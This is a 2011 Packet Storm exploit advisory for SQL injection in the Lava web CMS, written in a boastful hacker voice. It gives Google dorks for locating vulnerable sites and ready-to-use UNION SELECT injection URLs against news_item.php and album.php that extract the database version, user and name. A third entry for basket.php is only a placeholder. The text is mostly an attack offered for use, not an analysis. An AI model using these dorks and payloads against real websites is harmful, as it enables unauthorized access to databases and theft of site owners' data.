Lava SQL Injection

2011-07-26T00:00:00
ID PACKETSTORM:103425
Type packetstorm
Reporter Ehsan_Hp200
Modified 2011-07-26T00:00:00

Description

                                        
                                            `  
################################ IRANIAN THE BEST HACKERS IN THE WORLD ##################  
#################### ####################  
##  
## Remote SQL injection Vulnerability  
##  
## Lava (news_item.php?id) (album.php?id) (basket.php?baction)  
##   
###############################################################  
###############################################################  
###############################################################  
###############################################################  
##  
## AuTh0r : Ehsan_Hp200  
##  
## H0ME : www.ehsanhp.blogsky.com  
##  
## Email : Ehsan_Hp200@Hotmail.com  
##   
## Vendor : http://www.lava.com.ua/  
##   
## Persian Gulf 4 Ever!  
#############################  
#############################  
#############################  
#############################  
#############################  
##  
##  
  
Dork : "Разработано в компании "Lava"" "inurl:news_item.php?id="  
  
Exploite:  
  
www.victim.com/news_item.php?id=-1 union select 1,ConCat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15  
  
  
Dork : "Разработано в компании "Lava"" "inurl:album.php?id="  
  
Exploite :  
  
www.victim.com/album.php?id=-1+union+select+1,2,3,4,5,6,ConCat(version(),0x3a,user(),0x3a,database())  
  
  
Dork : "Разработано в компании "Lava"" "inurl:basket.php?baction="  
  
Exploite :  
  
www.victim.com/basket.php?baction=add&pid=[SQL]  
  
#########################################################################################  
SpeCial TanX To : Dj7Xpl  
##########################################################################################  
############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################   
`